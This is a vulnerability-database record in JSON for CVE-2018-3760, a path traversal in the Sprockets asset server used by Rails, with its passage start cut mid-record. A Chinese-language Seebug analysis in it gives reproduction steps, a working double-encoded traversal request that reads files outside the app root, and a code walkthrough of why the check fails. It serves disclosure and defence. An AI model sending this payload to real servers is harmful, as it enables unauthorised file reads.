Orange Tsai from DEVCORE for reporting this issue.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-22T10:42:20", "type": "hackerone", "title": "Ruby on Rails: Path Traversal on Default Installed Rails Application (Asset Pipeline)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-19T16:01:09", "id": "H1:307808", "href": "https://hackerone.com/reports/307808", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "debiancve": [{"lastseen": "2021-12-14T17:52:31", "description": "There is an information leak vulnerability in Sprockets. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower. Specially crafted requests can be used to access files that exists on the filesystem that is outside an application's root directory, when the Sprockets server is used in production. All users running an affected release should either upgrade or use one of the work arounds immediately.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-26T19:29:00", "type": "debiancve", "title": "CVE-2018-3760", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-06-26T19:29:00", "id": "DEBIANCVE:CVE-2018-3760", "href": "https://security-tracker.debian.org/tracker/CVE-2018-3760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2022-05-13T12:33:36", "description": "Specially crafted requests can be used to access files that exist on the filesystem that is outside an application's root directory, when the Sprockets server is used in production.\n \nAll users running an affected release should either upgrade or use one of the work arounds immediately.\n \nWorkaround:\n \nIn Rails applications, work around this issue, set `config.assets.compile = false` and `config.public_file_server.enabled = true` in an initializer and precompile the assets.\n\nThis work around will not be possible in all hosting environments and upgrading is advised.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-20T22:18:58", "type": "github", "title": "High severity vulnerability that affects sprockets", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2021-12-02T20:12:00", "id": "GHSA-PR3H-JJHJ-573X", "href": "https://github.com/advisories/GHSA-pr3h-jjhj-573x", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2018-08-08T05:53:47", "description": "### \u6f0f\u6d1e\u516c\u544a\r\n\u8be5\u6f0f\u6d1e\u7531\u5b89\u5168\u7814\u7a76\u4eba\u5458 Orange Tsai\u53d1\u73b0\u3002\u6f0f\u6d1e\u516c\u544a\u6765\u81ea https://groups.google.com/forum/#!topic/rubyonrails-security/ft_J--l55fM\r\n```\r\nThere is an information leak vulnerability in Sprockets. This vulnerability\r\nhas been assigned the CVE identifier CVE-2018-3760.\r\n\r\nVersions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower.\r\nNot affected: NONE\r\nFixed Versions: 4.0.0.beta8, 3.7.2, 2.12.5\r\n\r\nImpact\r\n------\r\nSpecially crafted requests can be used to access files that exists on\r\nthe filesystem that is outside an application's root directory, when the Sprockets server is\r\nused in production.\r\n\r\nAll users running an affected release should either upgrade or use one of the work arounds immediately.\r\n```\r\n\r\n\u5f71\u54cd\u9762\uff1a development servers\uff0c\u4e14\u5f00\u542f\u4e86 config.assets.compile\r\n\r\n### \u6f0f\u6d1e\u590d\u73b0\r\n\u672c\u5730\u5b89\u88c5\u597druby\u548crails\u3002\u4ee5ruby 2.4.4 \uff0crails v5.0.7\u4e3a\u4f8b\uff1a\r\n```\r\n$ gem rails -v 5.0.7\r\n$ rails new blog && cd blog\r\n```\r\n\r\n\u6b64\u65f6blog\u8fd9\u4e2arails\u9879\u76ee\u4f7f\u7528\u7684sprockets\u7248\u672c\u662f3.7.2\uff08fixed\uff09\u3002\u4fee\u6539blog\u76ee\u5f55\u4e0b\u7684Gemfile.lock\u7b2c122\u884c\uff1a\r\n```\r\nsprockets (3.7.1)\r\n```\r\n\r\n\u4fee\u6539\u914d\u7f6e\u6587\u4ef6 config/environments/production.rb\uff1a\r\n```\r\nconfig.assets.compile = true\r\n```\r\n\r\n\u5728blog\u76ee\u5f55\u4e0b\u6267\u884c\r\n```\r\n$ bundle install\r\n$ rails server \r\n * Min threads: 5, max threads: 5 \r\n * Environment: development \r\n * Listening on tcp://0.0.0.0:3000 \r\n Use Ctrl-C to stop\r\n```\r\n\r\npayload:\r\n```\r\nGET /assets/file:%2f%2f//C:/chybeta/blog/app/assets/config/%252e%252e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2fWindows/win.ini\r\n```\r\n\r\nwin\u5e73\u53f0\uff1a\r\n\r\n\r\n\r\nlinux\u5e73\u53f0\r\n\r\n\r\n\r\n### \u6f0f\u6d1e\u5206\u6790\r\n\u6ce8\uff1a\u4e3a\u660e\u767d\u8d77\u89c1\uff0c\u8bb8\u591a\u5206\u6790\u76f4\u63a5\u5199\u5728\u4ee3\u7801\u6ce8\u91ca\u90e8\u5206\uff0c\u8bf7\u7559\u610f\u3002\r\n\r\n\u95ee\u9898\u51fa\u5728sprockets\uff0c\u5b83\u7528\u6765\u68c0\u67e5 JavaScript \u6587\u4ef6\u7684\u76f8\u4e92\u4f9d\u8d56\u5173\u7cfb\uff0c\u7528\u4ee5\u4f18\u5316\u7f51\u9875\u4e2d\u5f15\u5165\u7684js\u6587\u4ef6\uff0c\u4ee5\u907f\u514d\u52a0\u8f7d\u4e0d\u5fc5\u8981\u7684js\u6587\u4ef6\u3002\u5f53\u8bbf\u95ee\u5982http://127.0.0.1:3000/assets/foo.js\u65f6\uff0c\u4f1a\u8fdb\u5165server.rb:\r\n```\r\ndef call(env)\r\n start_time = Time.now.to_f\r\n time_elapsed = lambda { ((Time.now.to_f - start_time) * 1000).to_i }\r\n\r\n if !['GET', 'HEAD'].include?(env['REQUEST_METHOD'])\r\n return method_not_allowed_response\r\n end\r\n\r\n msg = \"Served asset #{env['PATH_INFO']} -\"\r\n\r\n # Extract the path from everything after the leading slash\r\n path = Rack::Utils.unescape(env['PATH_INFO'].to_s.sub(/^\\//, ''))\r\n\r\n # Strip fingerprint\r\n if fingerprint = path_fingerprint(path)\r\n path = path.sub(\"-#{fingerprint}\", '')\r\n end\r\n # \u6b64\u65f6path\u503c\u4e3a file:///C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n\r\n # URLs containing a `\"..\"` are rejected for security reasons.\r\n if forbidden_request?(path)\r\n return forbidden_response(env)\r\n end\r\n\r\n ...\r\n\r\n asset = find_asset(path, options)\r\n ...\r\n```\r\nforbidden_request\u7528\u6765\u5bf9path\u8fdb\u884c\u68c0\u67e5\uff0c\u662f\u5426\u5305\u542b..\u4ee5\u9632\u6b62\u8def\u5f84\u7a7f\u8d8a\uff0c\u662f\u5426\u662f\u7edd\u5bf9\u8def\u5f84\uff1a\r\n```\r\nprivate\r\n def forbidden_request?(path)\r\n # Prevent access to files elsewhere on the file system\r\n #\r\n # http://example.org/assets/../../../etc/passwd\r\n #\r\n path.include?(\"..\") || absolute_path?(path)\r\nend\r\n```\r\n\r\n\u5982\u679c\u8bf7\u6c42\u4e2d\u5305\u542b..\u5373\u8fd4\u56de\u771f\uff0c\u7136\u540e\u8fd4\u56deforbidden_response(env)\u4fe1\u606f\u3002\r\n\r\n\r\n\r\n\u56de\u5230call\u51fd\u6570\uff0c\u8fdb\u5165find_asset(path, options)\uff0c\u5728 lib/ruby/gems/2.4.0/gems/sprockets-3.7.1/lib/sprockets/base.rb:63:\r\n```\r\n# Find asset by logical path or expanded path.\r\ndef find_asset(path, options = {})\r\n uri, _ = resolve(path, options.merge(compat: false))\r\n if uri\r\n # \u89e3\u6790\u51fa\u6765\u7684 uri \u503c\u4e3a file:///C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n load(uri)\r\n end\r\nend\r\n```\r\n\r\n\u8ddf\u8fdbload\uff0c\u5728 lib/ruby/gems/2.4.0/gems/sprockets-3.7.1/lib/sprockets/loader.rb:32 \u3002\u4ee5\u8bf7\u6c42GET /assets/file:%2f%2f//C:/chybeta/blog/app/assets/config/%252e%252e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2fWindows/win.ini\u4e3a\u4f8b\uff0c\u5176\u4e00\u6b65\u6b65\u7684\u89e3\u6790\u8fc7\u7a0b\u89c1\u4e0b\u6ce8\u91ca\uff1a\r\n```\r\ndef load(uri)\r\n # \u6b64\u65f6 uri \u5df2\u7ecf\u7ecf\u8fc7\u4e86\u4e00\u6b21\u7684url\u89e3\u7801 \r\n # \u5176\u503c\u4e3a file:///C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n unloaded = UnloadedAsset.new(uri, self)\r\n if unloaded.params.key?(:id)\r\n ...\r\n else\r\n asset = fetch_asset_from_dependency_cache(unloaded) do |paths|\r\n # When asset is previously generated, its \"dependencies\" are stored in the cache.\r\n # The presence of `paths` indicates dependencies were stored.\r\n # We can check to see if the dependencies have not changed by \"resolving\" them and\r\n # generating a digest key from the resolved entries. If this digest key has not\r\n # changed the asset will be pulled from cache.\r\n #\r\n # If this `paths` is present but the cache returns nothing then `fetch_asset_from_dependency_cache`\r\n # will confusingly be called again with `paths` set to nil where the asset will be\r\n # loaded from disk.\r\n\r\n # \u5f53\u5b58\u5728\u7f13\u5b58\u65f6\r\n if paths\r\n load_from_unloaded(unloaded)\r\n digest = DigestUtils.digest(resolve_dependencies(paths))\r\n if uri_from_cache = cache.get(unloaded.digest_key(digest), true)\r\n asset_from_cache(UnloadedAsset.new(uri_from_cache, self).asset_key)\r\n end\r\n else\r\n # \u5f53\u7f13\u5b58\u4e0d\u5b58\u5728\uff0c\u4e3b\u8981\u8003\u8651\u8fd9\u4e2a\r\n load_from_unloaded(unloaded)\r\n end\r\n end\r\n end\r\n Asset.new(self, asset)\r\nend\r\n```\r\n\u8ddf\u5165UnloadedAsset.new\r\n```\r\nclass UnloadedAsset\r\n def initialize(uri, env)\r\n @uri = uri.to_s\r\n @env = env\r\n @compressed_path = URITar.new(uri, env).compressed_path\r\n @params = nil # lazy loaded\r\n @filename = nil # lazy loaded \u5177\u4f53\u5b9e\u73b0\u89c1\u4e0b\u9762\r\n end\r\n ...\r\n # Internal: Full file path without schema\r\n #\r\n # This returns a string containing the full path to the asset without the schema.\r\n # Information is loaded lazilly since we want `UnloadedAsset.new(dep, self).relative_path`\r\n # to be fast. Calling this method the first time allocates an array and a hash.\r\n #\r\n # Example\r\n #\r\n # If the URI is `file:///Full/path/app/assets/javascripts/application.js\"` then the\r\n # filename would be `\"/Full/path/app/assets/javascripts/application.js\"`\r\n #\r\n # Returns a String.\r\n\r\n # \u7531\u4e8e\u91c7\u7528\u4e86Lazy loaded\uff0c\u5f53\u7b2c\u4e00\u6b21\u8bbf\u95ee\u5230filename\u8fd9\u4e2a\u5c5e\u6027\u65f6\uff0c\u4f1a\u8c03\u7528\u4e0b\u9762\u8fd9\u4e2a\u65b9\u6cd5\r\n def filename\r\n unless @filename\r\n load_file_params # \u8ddf\u8fdb\u53bb\uff0c\u89c1\u4e0b\r\n end\r\n @filename\r\n end\r\n ...\r\n # \u7b2c 130 \u884c\r\n private\r\n # Internal: Parses uri into filename and params hash\r\n #\r\n # Returns Array with filename and params hash\r\n def load_file_params\r\n # uri \u4e3a file:///C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n @filename, @params = URIUtils.parse_asset_uri(uri)\r\n end\r\n```\r\n\u8ddf\u5165URIUtils.parse_asset_uri\r\n```\r\ndef parse_asset_uri(uri)\r\n # uri \u4e3a file:///C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n # \u8ddf\u8fdb split_file_uri\r\n scheme, _, path, query = split_file_uri(uri)\r\n ...\r\n return path, parse_uri_query_params(query)\r\nend\r\n\r\n...# \u7701\u7565\r\n\r\ndef split_file_uri(uri)\r\n scheme, _, host, _, _, path, _, query, _ = URI.split(uri)\r\n # \u6b64\u65f6\u89e3\u6790\u51fa\u7684\u51e0\u4e2a\u53d8\u91cf\u5982\u4e0b\uff1a \r\n # scheme: file\r\n # host: \r\n # path: /C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n # query: \r\n path = URI::Generic::DEFAULT_PARSER.unescape(path)\r\n # \u8fd9\u91cc\u7ecf\u8fc7\u7b2c\u4e8c\u6b21\u7684url\u89e3\u7801\r\n # path\uff1a/C:/chybeta/blog/app/assets/config/../../../../../../../Windows/win.ini\r\n path.force_encoding(Encoding::UTF_8)\r\n\r\n # Hack for parsing Windows \"file:///C:/Users/IEUser\" paths\r\n path.gsub!(/^\\/([a-zA-Z]:)/, '\\1'.freeze)\r\n # path: C:/chybeta/blog/app/assets/config/../../../../../../../Windows/win.ini\r\n [scheme, host, path, query]\r\nend\r\n```\r\n\r\n\r\n\u5728\u5b8c\u6210\u4e86filename\u89e3\u6790\u540e\uff0c\u6211\u4eec\u56de\u5230load\u51fd\u6570\u672b\u5c3e\uff0c\u8fdb\u5165load_from_unloaded(unloaded):\r\n\r\n\r\n\r\n```\r\n# Internal: Loads an asset and saves it to cache\r\n #\r\n # unloaded - An UnloadedAsset\r\n #\r\n # This method is only called when the given unloaded asset could not be\r\n # successfully pulled from cache.\r\n def load_from_unloaded(unloaded)\r\n unless file?(unloaded.filename)\r\n raise FileNotFound, \"could not find file: #{unloaded.filename}\"\r\n end\r\n\r\n load_path, logical_path = paths_split(config[:paths], unloaded.filename)\r\n unless load_path\r\n raise FileOutsidePaths, \"#{unloaded.filename} is no longer under a load path: #{self.paths.join(', ')}\"\r\n end\r\n ....\r\n```\r\n\r\n\u4e3b\u8981\u662f\u8fdb\u884c\u4e86\u4e24\u4e2a\u68c0\u67e5\uff1a\u6587\u4ef6\u662f\u5426\u5b58\u5728\u548c\u662f\u5426\u5728\u5408\u89c4\u76ee\u5f55\u91cc\u3002\u4e3b\u8981\u5173\u6ce8\u7b2c\u4e8c\u4e2a\u68c0\u6d4b\u3002\u5176\u4e2dconfig[:paths]\u662f\u5141\u8bb8\u7684\u8def\u5f84\uff0c\u800cunloaded.filename\u662f\u8bf7\u6c42\u7684\u8def\u5f84\u6587\u4ef6\u540d\u3002\u8ddf\u5165 lib/ruby/gems/2.4.0/gems/sprockets-3.7.2/lib/sprockets/path_utils.rb:120\uff1a\r\n```\r\n# Internal: Detect root path and base for file in a set of paths.\r\n#\r\n# paths - Array of String paths\r\n# filename - String path of file expected to be in one of the paths.\r\n#\r\n# Returns [String root, String path]\r\ndef paths_split(paths, filename)\r\n # \u5bf9paths\u4e2d\u7684\u6bcf\u4e00\u4e2a path\r\n paths.each do |path|\r\n # \u5982\u679csubpath\u4e0d\u4e3a\u7a7a\r\n if subpath = split_subpath(path, filename)\r\n # \u5219\u8fd4\u56de path, subpath\r\n return path, subpath\r\n end\r\n end\r\n nil\r\nend\r\n```\r\n\r\n\u7ee7\u7eed\u8ddf\u5165split_subpath\uff0c lib/ruby/gems/2.4.0/gems/sprockets-3.7.2/lib/sprockets/path_utils.rb:103\u3002\u5047\u8bbe\u4e0a\u9762\u4f20\u5165\u7684path\u53c2\u6570\u662f\u3002\r\n```\r\n# Internal: Get relative path for root path and subpath.\r\n #\r\n # path - String path\r\n # subpath - String subpath of path\r\n #\r\n # Returns relative String path if subpath is a subpath of path, or nil if\r\n # subpath is outside of path.\r\n def split_subpath(path, subpath)\r\n return \"\" if path == subpath\r\n # \u6b64\u65f6 path \u4e3a C:/chybeta/blog/app/assets/config/../../../../../../../Windows/win.ini\r\n path = File.join(path, '')\r\n # \u6b64\u65f6 path \u4e3a C:/chybeta/blog/app/assets/config/../../../../../../../Windows/win.ini/\r\n # \u4e0e\u4f20\u5165\u7684\u7edd\u5bf9\u8def\u5f84\u8fdb\u884c\u6bd4\u8f83\r\n # \u5982\u679c\u4ee5 \u5141\u8bb8\u7684\u8def\u5f84 \u4e3a\u5f00\u5934\uff0c\u5219\u68c0\u67e5\u901a\u8fc7\u3002\r\n if subpath.start_with?(path)\r\n subpath[path.length..-1]\r\n else\r\n nil\r\n end\r\n end\r\n\t```\r\n\u901a\u8fc7\u68c0\u67e5\u540e\uff0c\u5728load_from_unloaded\u672b\u5c3e\u5373\u8fdb\u884c\u4e86\u8bfb\u53d6\u7b49\u64cd\u4f5c\uff0c\u4ece\u800c\u901a\u8fc7\u8def\u5f84\u7a7f\u8d8a\u9020\u6210\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u3002\r\n\r\n\u5982\u679c\u6587\u4ef6\u4ee5.erb\u7ed3\u5c3e\uff0c\u5219\u4f1a\u76f4\u63a5\u6267\u884c\uff1a\r\n\r\n### \u8865\u4e01\r\n\r\n\r\n\r\n\u5728server.rb\u4e2d\uff0c\u589e\u52a0\u5173\u952e\u5b57\u8fc7\u6ee4://\u3002\r\n\r\n### Reference\r\n* https://github.com/rails/sprockets/commit/c09131cf5b2c479263939c8582e22b98ed616c5f\r\n* https://blog.heroku.com/rails-asset-pipeline-vulnerability\r\n* https://twitter.com/orange_8361/status/1009309271698300928", "cvss3": {}, "published": "2018-08-08T00:00:00", "type": "seebug", "title": "Ruby on Rails \u8def\u5f84\u7a7f\u8d8a\u4e0e\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e(CVE-2018-3760)\u5206\u6790", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2018-08-08T00:00:00", "id": "SSV:97466", "href": "https://www.seebug.org/vuldb/ssvid-97466", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T17:15:38", "description": "There is an information leak vulnerability in Sprockets. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower. Specially crafted requests can be used to access files that exists on the filesystem that is outside an application's root directory, when the Sprockets server is used in production. All users running an affected release should either upgrade or use one of the work arounds immediately.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-26T19:29:00", "type": "cve", "title": "CVE-2018-3760", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2019-10-09T23:40:00", "cpe": ["cpe:/a:sprockets_project:sprockets:2.12.4", "cpe:/a:redhat:cloudforms:4.6", "cpe:/a:sprockets_project:sprockets:4.0.0", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/a:sprockets_project:sprockets:3.7.1", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/a:redhat:cloudforms:4.5", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:redhat:enterprise_linux:7.0"], "id": "CVE-2018-3760", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta6:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.7:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:redhat:cloudforms:4.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:2.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:sprockets_project:sprockets:4.0.0:beta7:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.6:*:*:*:*:*:*:*"]}]}